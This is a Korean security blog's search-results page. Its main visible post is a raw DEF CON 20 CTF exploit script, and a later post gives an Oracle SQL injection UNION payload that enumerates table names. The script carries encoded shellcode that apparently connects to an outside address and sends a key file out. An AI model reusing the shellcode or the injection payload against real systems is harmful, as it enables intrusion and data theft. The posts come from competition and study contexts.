Search results for 'before I die'

  1. 2012.06.16 -- defcon20 pp200 exploit
  2. 2012.05.15 -- pepassword
  3. 2012.05.09 -- pctf 2012 format
  4. 2012.03.30 -- YO!
  5. 2011.10.13 -- Yourself PHP
  6. 2011.10.06 -- guestbook
  7. 2011.10.03 -- ARM assembly를 공부합시다.
  8. 2011.09.27 -- table_name
  9. 2011.09.26 -- blinded by light
  10. 2011.09.01 -- oracle sql injection with rownum

defcon20 pp200 exploit

2012. 6. 16. 14:08
#!/usr/bin/python2.6
#defcon 2012, pp200 exploit - badcob

import socket, sys
from struct import pack 

def make_connection(host,port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    return s

#shellcode
scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"

host = "192.168.74.134"
port = 8912

num = "b74b9d86e6cd3480" + "\x0a"
user_id = "a6" + "\x0a"
ret = "\xbc\xe2\xbe\xbf"

#make payload
temp = "\x90"*416+scode+"\x90"*17+"\x0f"
temp += ret + "\x0a"

payload = ''

for x in temp:
    a = ord(x)^0xa6
    if a == 0xa:
        print "failed"
        break
    payload += chr(a)

s = make_connection(host,port) 
s.send(num)
print s.recv(128)
s.send(user_id)
print s.recv(128)
s.send(payload)

'CTF' 카테고리의 다른 글

Holyshield 2010 Write up  (2) 2012.11.28
JFF2 JH1  (2) 2012.08.11
jff2 silly100  (5) 2012.08.06
defcon20 bin200  (0) 2012.06.22
defcon20 pp400 exploit  (0) 2012.06.16
defcon20 pp300 exploit  (0) 2012.06.16
pctf 2012 format  (0) 2012.05.09
Defcon 19 b500 writeup  (0) 2011.06.17
ISEC 2010 level8 random array  (0) 2010.11.10

badcob CTF

pepassword

2012. 5. 15. 08:46
보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

pctf 2012 format

2012. 5. 9. 12:03
보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

YO!

2012. 3. 30. 08:01

LOL 씐나게 하다보니 완전 바보가 되었습니다. 

다시 일어설 수 있을지 모르겠습니다만

꿈을 이루기 위해 한 발자국 씩, 나아가 봅시다. 



'what`s up' 카테고리의 다른 글

8회 해킹방어대회 우승  (2) 2011.08.07
Wow!!!  (1) 2011.01.10
어디에  (0) 2010.09.07
i`m back  (0) 2010.03.26
passion  (0) 2009.11.17
hardware radio switch T_T  (2) 2009.11.07
coldplay scientist  (0) 2009.10.18
그러한  (0) 2009.10.13
이별  (0) 2009.09.01
기분이 오묘함  (0) 2009.08.24

badcob what`s up

Yourself PHP

2011. 10. 13. 18:14
보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

guestbook

2011. 10. 6. 13:32
보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

ARM assembly를 공부합시다.

2011. 10. 3. 12:39

리딧에 올라온 링크를 클릭했더니 ARM assembly에 대한 너무 좋은 블로그가 있더군요.

http://www.eggwall.com/2011/09/android-arm-assembly-device-set-up-part.html 

미루고 미뤄왔던 공부를 연휴를 맞이해서 해보자 라는 마음으로 시작했는데 처음부터 삐걱삐걱..

먼저 환경 셋팅에 대한 방법으로 2가지를 제시합니다.

1) QEMU를 이용한 방법
2) android 폰을 이용한 방법

둘다 해놓고 써도 될듯 싶었지만.. 우선 QEMU 를 선택했습니다.
툴까지 셋팅된 이미지를 압축 파일로 친절하게 올려놨습니다만 제 환경(vmware, ubuntu 10.04) 에서는 
세그 폴트를 뱉고 실행되질 않는 현상이..ㅠㅠ

이쪽은 잘 몰라서 뭘 어떻게 검색해야 될지도 막막했지만 구글신은 대충 입력해도 찾아주더이다. 


http://balau82.wordpress.com/2010/05/23/qemu-system-arm-segmentation-fault-in-ubuntu-lucid/ 

해결책은 메모리 옵션인 "-m 128M" 을 추가해주면 오케이.

qemu-system-arm  -m 128M -M versatilepb -kernel vmlinuz-2.6.26-2-versatile -initrd initrd.img-2.6.26-2-versatile -hda debian_lenny_arm_standard.qcow2 -append "root=/dev/sda1"

자자.. 이제 ARM assembly 공부를 해봅시다!




 

'Reversing' 카테고리의 다른 글

Protection ID  (0) 2011.05.11
Vmware detection by vmware I/O port  (0) 2011.04.18
TightVNC portable  (0) 2010.09.08
7.7 ddos 바이너리 대충 분석  (2) 2009.08.06
The best text for Reverse Engineering  (0) 2009.06.23
Reversing for Newbies (written by Lena)  (0) 2009.03.27
some instruction  (0) 2009.02.11
bypassing isDebuggerPresent WITHOUT changing mem  (0) 2009.01.28

badcob Reversing

table_name

2011. 9. 27. 17:14
보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

blinded by light

2011. 9. 26. 23:51
보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

oracle sql injection with rownum

2011. 9. 1. 16:39

질의 결과를 하나씩 뿐이 볼 수 없을 때 mysql의 limit 처럼 rownum을 사용해서 원하는 데이터를 볼 수 있다.
select문으로 충분히 결과를 뽑아 놓고 다시 rownum으로 특정 값을 선택.

union+select+1,table_name,''+
         from+(select+rownum AS rnum,table_name+from+
                 (select +table_name+from+all_tables+order+by+table_name)
                 +where+rownum <= 200)+
         where+rnum=1--

'Sabzil' 카테고리의 다른 글

SSDT & SSDT shadow restore  (0) 2014.02.12
Optimus G Pro(F240) rooting  (0) 2013.07.12
Linux Oracle GUI client  (0) 2013.05.15
Ubuntu 12.10 에서 libboost1.48-all-dev 가 설치 되지 않을 때  (3) 2013.02.14
how to set debug environment for android  (0) 2012.09.14
Shellcode site  (0) 2009.09.29
hey JJAAPPPHH ~  (4) 2009.08.17
hey JaPH  (1) 2009.08.12
6회 kisa 해킹방어대회 6번  (0) 2009.07.09
ABI (Application Binary Interface)  (0) 2009.03.17

badcob Sabzil